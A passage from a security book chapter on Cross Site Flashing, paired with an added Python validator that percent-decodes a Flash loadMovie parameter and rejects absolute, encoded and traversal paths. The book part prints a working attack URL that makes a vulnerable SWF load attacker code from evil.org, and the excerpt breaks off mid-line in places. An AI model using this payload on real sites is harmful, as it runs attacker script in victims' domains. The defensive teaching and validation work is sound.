Here's an example attack URL:
http://example.com/VulnerableMovie.swf?userinput3=http%3A//evil.org/HackWorld.swf%3F
The attacker must place the HackWorld SWF on his or her web site (say, evil.org) and place an insecure security policy on the site. Namely, add the file http://evil.org/crossdomain.xml, containing this:
Flash Player would first query the attack site for the crossdomain.xml security policy. Once it sees that it is allowed to access HackWorld, VulnerableMovie would load HackWorld, and in turn, HackWorld would execute the JavaScript in the domain that hosts VulnerableMovie (that is, example.com, not evil.org).
Chapter 9: Attacking Flash Applications 235
Stefano Di Paola calls this Cross Site Flashing (XSF). XSF has the same impact as XSS. Namely, this attack would load HackWorld in the domain of the vulnerable SWF, and in turn, HackWorld would execute its malicious JavaScript in the example.com domain.
The question mark (?, encoded as %3F) at the end of this attack string is unnecessary for attacking VulnerableMovie, but it acts like a comment. If the vulnerable code were this,
loadMovie(_root.
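As an added example that is not from the book: the defensive counterpart to the attack above, a validator for the value that ends up in loadMovie(). It is written in Python rather than ActionScript so it can run stand-alone; the function name and the sample values are constructed here. It percent-decodes the parameter repeatedly, so that %3A or %3F cannot hide a scheme or the trailing "comment" marker, and then allows only relative paths ending in .swf.

```python
from urllib.parse import unquote

# Constructed inputs for the demo: the first is the userinput3 value from the
# attack URL above; the rest are variants a validator must also reject.
SAMPLE_VALUES = [
    "http%3A//evil.org/HackWorld.swf%3F",       # attack value from the page
    "http%253A%2F%2Fevil.org%2FHackWorld.swf",  # double-encoded scheme
    "//evil.org/HackWorld.swf",                 # protocol-relative URL
    "intro.swf%3F",                             # trailing "comment" marker
    "../admin/Secret.swf",                      # directory traversal
    "movies/intro.swf",                         # the only legitimate value
]


def is_safe_movie_path(raw_param: str, max_decode_rounds: int = 3) -> bool:
    """True only if raw_param names a relative .swf path on the hosting origin.

    Decodes repeatedly so %3A (':'), %2F ('/') and %3F ('?') cannot hide an
    absolute URL or a query separator from the checks below.
    """
    value = raw_param
    for _ in range(max_decode_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = value.strip()
    if not value or "%" in value:            # empty, or still encoded after decoding
        return False
    if any(ord(c) < 0x20 for c in value):    # control characters (CR/LF/NUL)
        return False
    if ":" in value or "\\" in value:        # any scheme (http:, javascript:) or backslash
        return False
    if value.startswith("/"):                # root-absolute or protocol-relative (//host)
        return False
    if "?" in value or "#" in value:         # query/fragment: the %3F "comment" trick
        return False
    if ".." in value.split("/"):             # directory traversal
        return False
    return value.lower().endswith(".swf")


def check_values(values):
    """Map each raw parameter value to its verdict, for the demo below."""
    return {v: is_safe_movie_path(v) for v in values}


if __name__ == "__main__":
    for raw, ok in check_values(SAMPLE_VALUES).items():
        print(f"{'ALLOW' if ok else 'REJECT'}  {raw}")
```

The same checks belong in the SWF before loadMovie() is called (or in the server code that emits the flashvars), since Flash Player itself performs none of them.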